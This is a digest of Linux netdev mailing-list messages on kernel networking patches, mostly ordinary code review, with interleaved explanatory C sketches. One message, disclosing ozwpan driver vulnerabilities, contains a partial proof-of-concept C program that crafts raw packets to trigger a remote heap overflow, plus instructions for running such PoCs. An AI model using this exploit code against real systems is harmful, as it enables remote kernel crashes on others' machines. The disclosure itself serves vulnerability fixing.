Re: [PATCH -next] net: sched: use counter to break reclassify loops
Jamal Hadi Salim <j...@mojatatu.com> wrote:
> On 05/12/15 09:00, Florian Westphal wrote:
> > Jamal Hadi Salim <j...@mojatatu.com> wrote:
> > > Florian,
> > >
> > > In general I am in support of removing this, since the use case
> > > never materialized as being useful.
> > > However, this is not the same logic that was there before.
> > > To get equivalency you need to pass the limit into
> > > tc_classify_compat() so it can be reset.
> >
> > AFAICS this reset only happens when we return something other than
> > RECLASSIFY, which means the caller will not check the limit.
> >
> > So in fact it should be ok to remove this since the counter will
> > always start from 0 on the next tc_classify() invocation.
>
> Florian, consider the following scenario:
> Assume X is the max allowed reclassifies before bells start ringing.
> If we see up to X back-to-back reclassifies, we are very likely in a
> loop. We should see fire trucks arrive and bail out.
> If we see X-1 reclassifies followed by a pipe followed by X-1
> reclassifies followed by ok, then that looks like a healthy policy.
> But that is a total of 2X-2 reclassifies. You will bail out at X
> reclassifies; what I am saying is you shouldn't. And the existing
> logic doesn't.
>
> Does that make sense?

Yes, but, if we use your example above then:

tc_classify called
  limit 0
  tc_classify_compat called, ret RECLASSIFY
  limit 1
  tc_classify_compat called, ret RECLASSIFY
  limit 2
  tc_classify_compat called, ret PIPE (== 3)
tc_classify returns 3
tc_classify called
  limit 0
  ...

So we don't toss the skb, since any return value other than RECLASSIFY
will make tc_classify() return to its caller, and when the caller
invokes tc_classify again the limit variable is set to 0 again.

Does that make sense to you?

Thanks Jamal.
--
To unsubscribe from this list: send the line "unsubscribe netdev" in
the body of a message to majord...@vger.kernel.org
More majordomo info at http://vger.kernel.org/majordomo-info.html
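For anyone following the thread, here is a minimal userspace sketch of
the counter behaviour Florian describes. It is not the kernel code: the
verdict enum, the limit MAX_RECLASSIFY_LOOP = 4, the scripted classifier
and the function names are all assumptions made up for illustration.
The only point it models is that the counter is a local that starts at
0 on every top-level call, so only back-to-back reclassifies count.

```c
#include <stddef.h>

/* Hypothetical verdicts for this sketch; not the kernel's TC_ACT_* values. */
enum verdict { V_OK, V_RECLASSIFY, V_SHOT, V_PIPE };

/* Assumed limit, standing in for "X" in Jamal's scenario. */
#define MAX_RECLASSIFY_LOOP 4

/* A scripted classifier: each pass returns the next verdict in the list. */
struct script {
	const enum verdict *steps;
	size_t len;
	size_t pos;
};

/* One classification pass (the role tc_classify_compat() plays in the thread). */
static enum verdict classify_once(struct script *s)
{
	if (s->pos >= s->len)
		return V_OK;
	return s->steps[s->pos++];
}

/*
 * Top-level classification (the role of tc_classify() in the thread).
 * The counter is a local, so it is 0 again on every invocation and only
 * consecutive RECLASSIFY verdicts within one call can reach the limit.
 */
static enum verdict classify(struct script *s)
{
	int limit = 0;

	for (;;) {
		enum verdict v = classify_once(s);

		if (v != V_RECLASSIFY)
			return v;	/* any other verdict goes back to the caller */
		if (++limit >= MAX_RECLASSIFY_LOOP)
			return V_SHOT;	/* treated as a loop: drop */
	}
}
```

With X = 4, a script of three reclassifies, a pipe, three more
reclassifies and an ok yields PIPE from the first call and OK from the
second, even though 2X-2 reclassifies happened in total; four
reclassifies in a row within one call yield SHOT.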
Re: gone with the spring cleanup..
On 05/13/2015 12:55 PM, Or Gerlitz wrote:
> On 5/13/2015 1:42 PM, Jiri Pirko wrote:
> > Looks like the problem might be in named structures which are
> > supposed to be anonymous. Would you try the following patch:
> >
> > oh, switchdev_obj_vlan and switchdev_obj_ipv4_fib are used in
> > rocker.. So better:
>
> nope, fails.. if I remove the union (i.e. struct switchdev_obj has
> struct vlan and ipv4_fib fields) it works. Seems there's some problem
> also with anonymous unions.

Yes, we once had such an issue here btw:

https://git.kernel.org/cgit/linux/kernel/git/davem/net-next.git/commit/lib/test_bpf.c?id=ece80490e2c1cefda018b2e5b96d4f39083d9096
[PATCH iproute2] man ip-link: Remove extra GROUP explanation
From: Vadim Kochan <vadi...@gmail.com>

Remove double explanation of GROUP option from 'ip link set' section.

Signed-off-by: Vadim Kochan <vadi...@gmail.com>
---
 man/man8/ip-link.8.in | 8 +-------
 1 file changed, 1 insertion(+), 7 deletions(-)

diff --git a/man/man8/ip-link.8.in b/man/man8/ip-link.8.in
index 823246f..714aab4 100644
--- a/man/man8/ip-link.8.in
+++ b/man/man8/ip-link.8.in
@@ -714,12 +714,6 @@ tool can be used. But it allows to change network namespace only for physical de
 give the device a symbolic name for easy reference.
 
 .TP
-.BI group GROUP
-specify the group the device belongs to.
-The available groups are listed in file
-.BR @SYSCONFDIR@/group .
-
-.TP
 .BI vf NUM
 specify a Virtual Function device to be configured. The
 associated PF device must be specified using the
@@ -867,7 +861,7 @@ specifies which help of link type to dislpay.
 .SS
 .I GROUP
 may be a number or a string from the file
-.B /etc/iproute2/group
+.B @SYSCONFDIR@/group
 which can be manually filled.
 
 .SH EXAMPLES
-- 
2.3.1
Re: [PATCH net-next] tcp/dccp: tw_timer_handler() is static
From: Eric Dumazet <eric.duma...@gmail.com>
Date: Tue, 12 May 2015 06:22:56 -0700

> From: Eric Dumazet <eduma...@google.com>
>
> tw_timer_handler() is only used from net/ipv4/inet_timewait_sock.c
>
> Fixes: 789f558cfb36 ("tcp/dccp: get rid of central timewait timer")
> Signed-off-by: Eric Dumazet <eduma...@google.com>

Applied.
Re: [PATCH net-next] ipv4: __ip_local_out_sk() is static
From: Eric Dumazet <eric.duma...@gmail.com>
Date: Tue, 12 May 2015 06:31:48 -0700

> From: Eric Dumazet <eduma...@google.com>
>
> __ip_local_out_sk() is only used from net/ipv4/ip_output.c
>
> net/ipv4/ip_output.c:94:5: warning: symbol '__ip_local_out_sk' was not
> declared. Should it be static?
>
> Fixes: 7026b1ddb6b8 ("netfilter: Pass socket pointer down through okfn().")
> Signed-off-by: Eric Dumazet <eduma...@google.com>

Applied.
Re: [PATCH v3 net-next 1/5] net: Get skb hash over flow_keys structure
From: Tom Herbert <t...@herbertland.com>
Date: Tue, 12 May 2015 08:22:58 -0700

> @@ -15,6 +15,13 @@
>   * All the members, except thoff, are in network byte order.
>   */
>  struct flow_keys {
> +	u16 thoff;
> +	u16 padding1;
> +#define FLOW_KEYS_HASH_START_FIELD n_proto
> +	__be16 n_proto;
> +	u8 ip_proto;
> +	u8 padding;
> +

This padding works if everyone consistently zero initializes the whole
key structure, but for whatever reason (performance, unintentional
oversight, etc.) not all paths do.

So, for example, inet_set_txhash() is going to have random crap in
keys.padding, so the hashes computed are not stable for a given flow
key tuple.

That's just the first code path I found with this issue; there are
probably several others.
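To make the padding concern concrete, here is a small userspace sketch.
It is only an illustration under stated assumptions: struct demo_keys
loosely mirrors the quoted hunk, FNV-1a stands in for whatever hash the
kernel actually uses, and hash_bytes(), hash_keys() and fill_keys() are
hypothetical names. It shows that hashing the raw bytes from the start
field onwards is only stable if the padding bytes are zeroed first.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical key layout, loosely modelled on the quoted hunk. */
struct demo_keys {
	uint16_t thoff;
	uint16_t padding1;
	uint16_t n_proto;	/* hashing starts here */
	uint8_t  ip_proto;
	uint8_t  padding;
};

/* FNV-1a over raw bytes; a stand-in, not the kernel's hash function. */
static uint32_t hash_bytes(const void *p, size_t len)
{
	const uint8_t *b = p;
	uint32_t h = 2166136261u;
	size_t i;

	for (i = 0; i < len; i++) {
		h ^= b[i];
		h *= 16777619u;
	}
	return h;
}

/* Hash everything from n_proto to the end of the struct, padding included. */
static uint32_t hash_keys(const struct demo_keys *k)
{
	size_t start = offsetof(struct demo_keys, n_proto);

	return hash_bytes((const uint8_t *)k + start, sizeof(*k) - start);
}

/* Zero the whole struct before filling it, so padding is deterministic. */
static void fill_keys(struct demo_keys *k, uint16_t n_proto, uint8_t ip_proto)
{
	memset(k, 0, sizeof(*k));
	k->n_proto = n_proto;
	k->ip_proto = ip_proto;
}
```

Two keys filled through fill_keys() with the same protocol values hash
identically no matter what was in memory before. If a path skips the
memset and leaves a stray value in the padding byte, the hash for the
same tuple changes, which is the instability described above.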
[PATCH 1/4] ozwpan: Use proper check to prevent heap overflow
Since elt->length is a u8, we can make this variable a u8. Then we can
do proper bounds checking more easily. Without this, a potentially
negative value is passed to the memcpy inside oz_hcd_get_desc_cnf,
resulting in a remotely exploitable heap overflow with network
supplied data.

This could result in remote code execution. A PoC which obtains DoS
follows below. It requires the ozprotocol.h file from this module.

=-=-=-=-=-=

 #include <arpa/inet.h>
 #include <linux/if_packet.h>
 #include <net/if.h>
 #include <netinet/ether.h>
 #include <stdio.h>
 #include <string.h>
 #include <stdlib.h>
 #include <endian.h>
 #include <sys/ioctl.h>
 #include <sys/socket.h>

 #define u8 uint8_t
 #define u16 uint16_t
 #define u32 uint32_t
 #define __packed __attribute__((__packed__))
 #include "ozprotocol.h"

static int hex2num(char c)
{
	if (c >= '0' && c <= '9')
		return c - '0';
	if (c >= 'a' && c <= 'f')
		return c - 'a' + 10;
	if (c >= 'A' && c <= 'F')
		return c - 'A' + 10;
	return -1;
}
static int hwaddr_aton(const char *txt, uint8_t *addr)
{
	int i;
	for (i = 0; i < 6; i++) {
		int a, b;
		a = hex2num(*txt++);
		if (a < 0)
			return -1;
		b = hex2num(*txt++);
		if (b < 0)
			return -1;
		*addr++ = (a << 4) | b;
		if (i < 5 && *txt++ != ':')
			return -1;
	}
	return 0;
}

int main(int argc, char *argv[])
{
	if (argc < 3) {
		fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]);
		return 1;
	}

	uint8_t dest_mac[6];
	if (hwaddr_aton(argv[2], dest_mac)) {
		fprintf(stderr, "Invalid mac address.\n");
		return 1;
	}

	int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);
	if (sockfd < 0) {
		perror("socket");
		return 1;
	}

	struct ifreq if_idx;
	int interface_index;
	strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1);
	if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) {
		perror("SIOCGIFINDEX");
		return 1;
	}
	interface_index = if_idx.ifr_ifindex;
	if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) {
		perror("SIOCGIFHWADDR");
		return 1;
	}
	uint8_t *src_mac = (uint8_t *)if_idx.ifr_hwaddr.sa_data;

	struct {
		struct ether_header ether_header;
		struct oz_hdr oz_hdr;
		struct oz_elt oz_elt;
		struct oz_elt_connect_req oz_elt_connect_req;
	} __packed connect_packet = {
		.ether_header = {
			.ether_type = htons(OZ_ETHERTYPE),
			.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
			.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
		},
		.oz_hdr = {
			.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
			.last_pkt_num = 0,
			.pkt_num = htole32(0)
		},
		.oz_elt = {
			.type = OZ_ELT_CONNECT_REQ,
			.length = sizeof(struct oz_elt_connect_req)
		},
		.oz_elt_connect_req = {
			.mode = 0,
			.resv1 = {0},
			.pd_info = 0,
			.session_id = 0,
			.presleep = 35,
			.ms_isoc_latency = 0,
			.host_vendor = 0,
			.keep_alive = 0,
			.apps = htole16((1 << OZ_APPID_USB) | 0x1),
			.max_len_div16 = 0,
			.ms_per_isoc = 0,
			.up_audio_buf = 0,
			.ms_per_elt = 0
		}
	};

	struct {
		struct ether_header ether_header;
		struct oz_hdr oz_hdr;
		struct oz_elt oz_elt;
		struct oz_get_desc_rsp oz_get_desc_rsp;
	} __packed pwn_packet = {
		.ether_header = {
			.ether_type = htons(OZ_ETHERTYPE),
			.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
			.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
		},
		.oz_hdr = {
			.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
			.last_pkt_num = 0,
			.pkt_num = htole32(1)
		},
		.oz_elt = {
			.type =
Re: [oss-security] [PATCH 0/4] ozwpan: Four remote packet-of-death vulnerabilities
On Wed, May 13, 2015 at 08:33:30PM +0200, Jason A. Donenfeld wrote:
> The ozwpan driver accepts network packets, parses them, and converts
> them into various USB functionality. There are numerous security
> vulnerabilities in the handling of these packets. Two of them result in
> a memcpy(kernel_buffer, network_packet, -length), one of them is a
> divide-by-zero, and one of them is a loop that decrements -1 until it's
> zero.
>
> I've written a very simple proof-of-concept for each one of these
> vulnerabilities to aid with detecting and fixing them. The general
> operation of each proof-of-concept code is:
>
>   - Load the module with:
>     # insmod ozwpan.ko g_net_dev=eth0
>   - Compile the PoC with ozprotocol.h from the kernel tree:
>     $ cp /path/to/linux/drivers/staging/ozwpan/ozprotocol.h ./
>     $ gcc ./poc.c -o ./poc
>   - Run the PoC:
>     # ./poc eth0 [mac-address]
>
> These PoCs should also be useful to the maintainers for testing out
> constructing and sending various other types of malformed packets
> against which this driver should be hardened.
>
> Please assign CVEs for these vulnerabilities. I believe the first two
> patches of this set can receive one CVE for both, and the remaining two
> can receive one CVE each.
>
> On a slightly related note, there are several other vulnerabilities in
> this driver that are worth looking into. When ozwpan receives a packet,
> it casts the packet into a variety of different structs, based on the
> value of type and length parameters inside the packet. When making
> these casts, and when reading bytes based on this length parameter, the
> actual length of the packet in the socket buffer is never actually
> consulted. As such, it's very likely that a packet could be sent that
> results in the kernel reading memory in adjacent buffers, resulting in
> an information leak, or from unpaged addresses, resulting in a crash.
> In the former case, it may be possible with certain message types to
> actually send these leaked adjacent bytes back to the sender of the
> packet. So, I'd highly recommend the maintainers of this driver go
> branch-by-branch from the initial rx function, adding checks to ensure
> all reads and casts are within the bounds of the socket buffer.
>
> Jason A. Donenfeld (4):
>   ozwpan: Use proper check to prevent heap overflow
>   ozwpan: Use unsigned ints to prevent heap overflow
>   ozwpan: divide-by-zero leading to panic
>   ozwpan: unchecked signed subtraction leads to DoS
>
>  drivers/staging/ozwpan/ozhcd.c     |  8
>  drivers/staging/ozwpan/ozusbif.h   |  4 ++--
>  drivers/staging/ozwpan/ozusbsvc1.c | 11 +--
>  3 files changed, 15 insertions(+), 8 deletions(-)

Any reason you didn't cc: the maintainer who could actually apply these
to the kernel tree?

Please use scripts/get_maintainer.pl to properly notify the correct
people.

thanks,

greg k-h
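The recommendation in the quoted cover letter, checking every cast and
read against the real buffer length, can be sketched in plain userspace
C. This is only an illustration under assumptions: struct demo_elt (one
type byte, one length byte, then payload) and count_elts() are
hypothetical and are not taken from ozprotocol.h or the driver. The
shape of the check is the point: keep lengths unsigned, and compare
against the bytes remaining before touching a header or its payload.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical element header for this sketch: type, length, then payload. */
struct demo_elt {
	uint8_t type;
	uint8_t length;	/* payload bytes that follow the header */
};

/*
 * Walk a buffer of back-to-back elements.
 * Returns the number of well-formed elements, or -1 as soon as a header
 * or payload would extend past the end of the buffer.
 */
static int count_elts(const uint8_t *buf, size_t buf_len)
{
	size_t off = 0;
	int n = 0;

	while (off < buf_len) {
		const struct demo_elt *elt;
		size_t remaining = buf_len - off;

		/* Is there room for the header itself? */
		if (remaining < sizeof(*elt))
			return -1;
		elt = (const struct demo_elt *)(buf + off);

		/* Does the claimed payload fit in what is left? (all unsigned) */
		if (elt->length > remaining - sizeof(*elt))
			return -1;

		off += sizeof(*elt) + elt->length;
		n++;
	}
	return n;
}
```

A buffer holding {1, 2, 0xaa, 0xbb, 2, 0} parses as two elements; a
three-byte buffer whose header claims 200 payload bytes is rejected
rather than read past its end.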
Re: [patch -next] net: macb: OR vs AND typos
From: Dan Carpenter <dan.carpen...@oracle.com>
Date: Tue, 12 May 2015 21:15:24 +0300

> The bitwise tests are always true here because it uses '|' where '&'
> is intended.
>
> Fixes: 98b5a0f4a228 ('net: macb: Add support for jumbo frames')
> Signed-off-by: Dan Carpenter <dan.carpen...@oracle.com>

Applied, thanks.
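A tiny illustration of the class of bug fixed here, for readers who
have not hit it before. The flag name DEMO_CAP_JUMBO and both helper
functions are invented for this sketch and are not the macb driver's
identifiers.

```c
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical capability bit, for illustration only. */
#define DEMO_CAP_JUMBO (1u << 3)

/* Buggy form: OR-ing in a non-zero flag is non-zero for every input. */
static bool has_jumbo_buggy(uint32_t caps)
{
	return (caps | DEMO_CAP_JUMBO) != 0;
}

/* Intended form: AND masks out everything except the bit being tested. */
static bool has_jumbo_fixed(uint32_t caps)
{
	return (caps & DEMO_CAP_JUMBO) != 0;
}
```

With caps == 0 the buggy test still reports the capability as present,
while the fixed test does not.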
Re: [PATCH -next] net: sched: use counter to break reclassify loops
From: Florian Westphal <f...@strlen.de>
Date: Mon, 11 May 2015 19:50:41 +0200

> Seems all we want here is to avoid endless 'goto reclassify' loop.
> tc_classify_compat even resets this counter when something other
> than TC_ACT_RECLASSIFY is returned, so this skb-counter doesn't
> break hypothetical loops induced by something other than perpetual
> TC_ACT_RECLASSIFY return values.
>
> skb_act_clone is now identical to skb_clone, so just use that.
>
> Tested with following (bogus) filter:
> tc filter add dev eth0 parent : \
>  protocol ip u32 match u32 0 0 police rate 10Kbit burst \
>  64000 mtu 1500 action reclassify
>
> Acked-by: Daniel Borkmann <dan...@iogearbox.net>
> Signed-off-by: Florian Westphal <f...@strlen.de>

Applied, thanks everyone.
Re: [PATCH net-next,1/1] hv_netvsc: use per_cpu stats to calculate TX/RX data
From: six...@microsoft.com
Date: Tue, 12 May 2015 15:50:02 -0700

> From: Simon Xiao <six...@microsoft.com>
>
> Current code does not lock anything when calculating the TX and RX stats.
> As a result, the RX and TX data reported by ifconfig are not accurate in a
> system with high network throughput and multiple CPUs (in my test,
> RX/TX = 83% between 2 HyperV VM nodes which have 8 vCPUs and 40G Ethernet).
>
> This patch fixes the above issue by using per_cpu stats.
> netvsc_get_stats64() summarizes TX and RX data by iterating over all CPUs
> to get their respective stats.
>
> Signed-off-by: Simon Xiao <six...@microsoft.com>
> Reviewed-by: K. Y. Srinivasan <k...@microsoft.com>
> Reviewed-by: Haiyang Zhang <haiya...@microsoft.com>
> ---
>  drivers/net/hyperv/hyperv_net.h | 9 +
>  drivers/net/hyperv/netvsc_drv.c | 80 -
>  2 files changed, 81 insertions(+), 8 deletions(-)
>
> diff --git a/drivers/net/hyperv/hyperv_net.h b/drivers/net/hyperv/hyperv_net.h
> index 41071d3..5a92b36 100644
> --- a/drivers/net/hyperv/hyperv_net.h
> +++ b/drivers/net/hyperv/hyperv_net.h
> @@ -611,6 +611,12 @@ struct multi_send_data {
>  	u32 count; /* counter of batched packets */
>  };
>  
> +struct netvsc_stats {
> +	u64 packets;
> +	u64 bytes;
> +	struct u64_stats_sync s_sync;
> +};
> +
>  /* The context of the netvsc device */
>  struct net_device_context {
>  	/* point back to our device context */
> @@ -618,6 +624,9 @@ struct net_device_context {
>  	struct delayed_work dwork;
>  	struct work_struct work;
>  	u32 msg_enable; /* debug level */
> +
> +	struct netvsc_stats __percpu *tx_stats;
> +	struct netvsc_stats __percpu *rx_stats;
>  };
>  
>  /* Per netvsc device */
> diff --git a/drivers/net/hyperv/netvsc_drv.c b/drivers/net/hyperv/netvsc_drv.c
> index 5993c7e..310b902 100644
> --- a/drivers/net/hyperv/netvsc_drv.c
> +++ b/drivers/net/hyperv/netvsc_drv.c
> @@ -391,7 +391,7 @@ static int netvsc_start_xmit(struct sk_buff *skb, struct net_device *net)
>  	u32 skb_length;
>  	u32 pkt_sz;
>  	struct hv_page_buffer page_buf[MAX_PAGE_BUFFER_COUNT];
> -
> +	struct netvsc_stats *tx_stats = this_cpu_ptr(net_device_ctx->tx_stats);
>  
>  	/* We will atmost need two pages to describe the rndis
>  	 * header. We can only transmit MAX_PAGE_BUFFER_COUNT number
> @@ -580,8 +580,10 @@ do_send:
>  
>  drop:
>  	if (ret == 0) {
> -		net->stats.tx_bytes += skb_length;
> -		net->stats.tx_packets++;
> +		u64_stats_update_begin(&tx_stats->s_sync);
> +		tx_stats->packets++;
> +		tx_stats->bytes += skb_length;
> +		u64_stats_update_end(&tx_stats->s_sync);
>  	} else {
>  		if (ret != -EAGAIN) {
>  			dev_kfree_skb_any(skb);
> @@ -644,13 +646,17 @@ int netvsc_recv_callback(struct hv_device *device_obj,
>  				struct ndis_tcp_ip_checksum_info *csum_info)
>  {
>  	struct net_device *net;
> +	struct net_device_context *net_device_ctx;
>  	struct sk_buff *skb;
> +	struct netvsc_stats *rx_stats;
>  
>  	net = ((struct netvsc_device *)hv_get_drvdata(device_obj))->ndev;
>  	if (!net || net->reg_state != NETREG_REGISTERED) {
>  		packet->status = NVSP_STAT_FAIL;
>  		return 0;
>  	}
> +	net_device_ctx = netdev_priv(net);
> +	rx_stats = this_cpu_ptr(net_device_ctx->rx_stats);
>  
>  	/* Allocate a skb - TODO direct I/O to pages? */
>  	skb = netdev_alloc_skb_ip_align(net, packet->total_data_buflen);
> @@ -686,8 +692,10 @@ int netvsc_recv_callback(struct hv_device *device_obj,
>  	skb_record_rx_queue(skb, packet->channel->
>  			    offermsg.offer.sub_channel_index);
>  
> -	net->stats.rx_packets++;
> -	net->stats.rx_bytes += packet->total_data_buflen;
> +	u64_stats_update_begin(&rx_stats->s_sync);
> +	rx_stats->packets++;
> +	rx_stats->bytes += packet->total_data_buflen;
> +	u64_stats_update_end(&rx_stats->s_sync);
>  
>  	/*
>  	 * Pass the skb back up. Network stack will deallocate the skb when it
> @@ -753,6 +761,46 @@ static int netvsc_change_mtu(struct net_device *ndev, int mtu)
>  	return 0;
>  }
>  
> +static struct rtnl_link_stats64 *netvsc_get_stats64(struct net_device *net,
> +						    struct rtnl_link_stats64 *t)
> +{
> +	struct net_device_context *ndev_ctx = netdev_priv(net);
> +	int cpu;
> +
> +	for_each_possible_cpu(cpu) {
> +		struct netvsc_stats *tx_stats = per_cpu_ptr(ndev_ctx->tx_stats,
> +							    cpu);
> +		struct netvsc_stats *rx_stats = per_cpu_ptr(ndev_ctx->rx_stats,
> +							    cpu);
> +		u64 tx_packets, tx_bytes, rx_packets, rx_bytes;
> +		unsigned int start;
> +
> +		do {
> +			start = u64_stats_fetch_begin_irq(&tx_stats->s_sync);
> +			tx_packets = tx_stats->packets;
> +
Re: [PATCH] vlan: Correctly propagate promisc|allmulti flags in notifier.
From: Vladislav Yasevich <vyasev...@gmail.com>
Date: Tue, 12 May 2015 20:53:14 -0400

> Currently vlan notifier handler will try to update all vlans
> for a device when that device comes up. A problem occurs,
> however, when the vlan device was set to promiscuous, but not
> by the user (ex: a bridge). In that case, dev->gflags are
> not updated. What results is that the lower device ends
> up with an extra promiscuity count. Here are the
> backtraces that prove this:
 ...
> The above comes from setting the vlan device to IFF_UP state.
 ...
> And this one comes from the notification code. What we end up with
> is a vlan with promiscuity count of 1 and a physical device
> with a promiscuity count of 2. They should both have a count of 1.
>
> To resolve this issue, vlan code can use dev_get_flags() api
> which correctly masks promiscuity and allmulti flags.

Applied, thanks Vlad.

> Sign-off-by: Vlad Yasevich <vyase...@redhat.com>

Note, it's "Signed-off-by: " not "Sign-off-by: ". I fixed this for you.
Re: [PATCH 0/5 net-next] Netfilter ingress support (v4)
From: Pablo Neira Ayuso <pa...@netfilter.org>
Date: Wed, 13 May 2015 18:19:33 +0200

> This is the v4 round of patches to add the Netfilter ingress hook, it
> basically comes in two steps:
 ...
> Please, apply. Thanks.

Series applied, thanks Pablo.
Re: [PATCH 5/5] netfilter: add netfilter ingress hook after handle_ing() under unique static key
From: Nicolas Dichtel <nicolas.dich...@6wind.com>
Date: Wed, 13 May 2015 21:36:25 +0200

> On 13/05/2015 18:19, Pablo Neira Ayuso wrote:
> [snip]
> > --- /dev/null
> > +++ b/include/linux/netfilter_ingress.h
> [snip]
> > +static inline void nf_hook_ingress_init(struct net_device *dev)
> > +{
> > +        INIT_LIST_HEAD(&dev->nf_hooks_ingress);
> nit: this line is indented with spaces instead of a tab.

I took care of this when I applied Pablo's series.

Thanks.
Re: [PATCH net-next v2 0/2] sfc: Bowdlerise PTP MCDI errors
From: Edward Cree <ec...@solarflare.com>
Date: Tue, 12 May 2015 13:03:27 +0100

> When the NIC doesn't support PTP, probe-time MCDI commands fail in
> predictable ways. Instead of logging cryptic MCDI errors, just log
> that PTP isn't supported.
>
> v2: Hopefully stop Thunderbird mangling the patches.

Series applied, thanks.
Re: [PATCH net-next] net: kill useless net_*_ingress_queue() definitions when NET_CLS_ACT is unset
From: Pablo Neira Ayuso <pa...@netfilter.org>
Date: Tue, 12 May 2015 20:28:07 +0200

> This fixes 4577139b2dabf589 ("net: use jump label patching for ingress
> qdisc in __netif_receive_skb_core").
>
> The only client of this is sch_ingress and it depends on NET_CLS_ACT. So
> there is no way these definitions can be of any help.
>
> Cc: Daniel Borkmann <dan...@iogearbox.net>
> Signed-off-by: Pablo Neira Ayuso <pa...@netfilter.org>

Applied, thanks Pablo.
Re: [PATCH v3] add GENEVE netdev tunnel driver
From: John W. Linville <linvi...@tuxdriver.com>
Date: Wed, 13 May 2015 12:57:25 -0400

> This 5-patch kernel series adds a netdev implementation of a GENEVE
> tunnel driver, and the single iproute2 patch enables creation and
> such for those netdevs. This makes use of the existing GENEVE
> infrastructure already used by the OVS code. The net/ipv4/geneve.c file
> is renamed as net/ipv4/geneve_core.c as part of these changes.
 ...
> The overall structure of the GENEVE netdev driver is strongly
> influenced by the VXLAN netdev driver. This is not surprising, as the
> two drivers are intended to serve similar purposes. As development of
> the GENEVE driver continues, it is likely that those similarities will
> grow stronger. This will include both simple configuration options
> (e.g. TOS and TTL settings) and new control plane support.
>
> The current implementation is very simple, restricting itself to point
> to point links over IPv4. This is due only to the simplicity of the
> implementation, and no such limit is inherent to GENEVE in any way.
> Support for IPv6 links and more sophisticated control plane options
> are predictable enhancements.
>
> Using the included iproute2 patch, a GENEVE tunnel is created thusly:
>
>         ip link add dev gnv0 type geneve remote 192.168.22.1 vni 1234
>         ip link set gnv0 up
>         ip addr add 10.1.1.1/24 dev gnv0
>
> After a corresponding tunnel interface is created at the link partner,
> traffic should proceed as expected.
>
> Please let me know if anyone has problems...thanks!

Looks good, series applied, thanks John!
Re: [PATCH net 1/2] ipv6: do not delete previously existing ECMP routes if add fails
On Wed, May 13, 2015 at 06:30:20AM -0700, roopa wrote:
> This looks like a similar bug I was trying to fix some time back:
> http://patchwork.ozlabs.org/patch/362296/
> (I am not sure if my full patch is still valid. I was thinking of
> re-spinning it sometime soon. If you are interested in trying it out,
> please do)

It's essentially the same idea, but I prefer to use the variable
"remaining", which is already there and is needed anyway, rather than
introduce three extra variables for the cleanup (which is quite similar
to the suggestion from Hannes' reply). I sent v2 a few minutes ago.

Michal Kubecek
Re: [patch net-next v3 00/15] introduce programable flow dissector and cls_flower
From: Jiri Pirko <j...@resnulli.us>
Date: Tue, 12 May 2015 14:56:06 +0200

> Per Davem's request, I prepared this patchset which introduces programmable
> flow dissector. For current users of flow_keys, there is a wrapper
> skb_flow_dissect_flow_keys which maintains the previous behaviour.
> For purposes of cls_flower, couple of new dissection keys were introduced.
> Note that this dissector can be also eventually used by openvswitch code.
>
> Also, as a next step, I plan to get rid of *skb_flow_get_ports(export)
> and *__skb_get_poff as their functionality can be now implemented by
> skb_flow_dissect as well.
>
> v2->v3:
> - remove TCA_FLOWER_POLICE attr suggested by Jamal
>
> v1->v2:
> - move __skb_tx_hash rather to dev.c as suggested by Alex

Ok, assuming this passes all of my build tests, I'll push this into
net-next.

I'm sure there will be some performance improvements possible, and I
hope you will look into making sure this new programmable classifier
is as light weight as possible.

Anyways, thanks a lot.
Re: [PATCH net-next v3 0/6] refine rollover
From: Willem de Bruijn <will...@google.com>
Date: Tue, 12 May 2015 11:56:44 -0400

> From: Willem de Bruijn <will...@google.com>
>
> refine packet socket rollover:
>
> 1. mitigate a case of lock contention
> 2. avoid exporting resource exhaustion to other sockets,
>    by migrating only to a victim socket that has ample room
> 3. avoid reordering of most flows on the socket,
>    by migrating first the flow responsible for load imbalance
> 4. help processes detect load imbalance,
>    by exporting rollover counters
>
> Context: rollover implements flow migration in packet socket fanout
> groups in case of extreme load imbalance. It is a specific
> implementation of migration that minimizes reordering by selecting
> the same victim socket when possible (and by selecting subsequent
> victims in a round robin fashion, from which its name derives).

The user API looks a lot better now, series applied, thanks Willem.
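As a rough mental model of points 2 and the "same victim, then round
robin" context above, here is a userspace sketch. It is not the
af_packet code: the room levels, pick_victim() and the array-of-sockets
representation are assumptions made up for illustration, and point 3
(migrating the flow responsible for the imbalance first) is not
modelled at all.

```c
#include <stddef.h>

/* Hypothetical room levels for a socket's receive ring in this sketch. */
enum demo_room { ROOM_NONE, ROOM_LOW, ROOM_NORMAL };

/*
 * Pick the socket that should receive a packet originally hashed to `self`.
 * room[i] is the room level of socket i, num (>= 1) is the group size, and
 * *last_victim remembers the previous choice across calls.
 * Returns `self` when it has ample room or when no other socket does.
 */
static size_t pick_victim(const int *room, size_t num, size_t self,
			  size_t *last_victim)
{
	size_t i;

	/* No imbalance: keep the packet where the hash put it. */
	if (room[self] == ROOM_NORMAL)
		return self;

	/* Prefer the previous victim, to limit reordering. */
	if (*last_victim != self && *last_victim < num &&
	    room[*last_victim] == ROOM_NORMAL)
		return *last_victim;

	/* Otherwise search round robin, starting after the previous victim. */
	for (i = 1; i <= num; i++) {
		size_t j = (*last_victim + i) % num;

		/* Only migrate to a socket with ample room. */
		if (j != self && room[j] == ROOM_NORMAL) {
			*last_victim = j;
			return j;
		}
	}

	/* Nobody has ample room: do not export the overload. */
	return self;
}
```

In this model a congested socket keeps sending to the same victim for
as long as that victim has ample room, moves on to the next candidate
in ring order once it does not, and keeps its own traffic when every
other socket is short on room.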
